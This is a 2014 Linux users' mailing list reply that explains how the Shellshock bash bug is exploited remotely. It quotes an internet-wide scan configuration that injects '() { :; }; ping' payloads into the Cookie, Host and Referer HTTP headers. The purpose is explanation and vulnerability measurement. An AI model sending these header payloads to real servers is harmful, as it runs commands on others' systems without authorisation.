[Cialug] Shellshock Bash Remote Code Execution Vulnerability
Paul Gray
gray at cs.uni.edu
Thu Sep 25 12:57:27 CDT 2014
On 09/25/2014 12:23 PM, Scott Yates wrote:
> Help me understand a couple thingss:
>
> How is this operating remotely? I understand this being a problem if
> people have shell access to a box, but how is it that anything "remote" is
> allowed to set an environment variable in the first place?
>
> Am I missing something here, or is this only a problem if someone already
> has shell access?
> _______________________________________________
> Cialug mailing list
> Cialug at cialug.org
> http://cialug.org/mailman/listinfo/cialug
>
The original post in this thread also had a description of the remote
exploitation with http headers (which he pulled from Robert's post):
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74
These headers caused the remote host to ping...that is, to execute the
command after the function definition.
-PG
More information about the Cialug
mailing list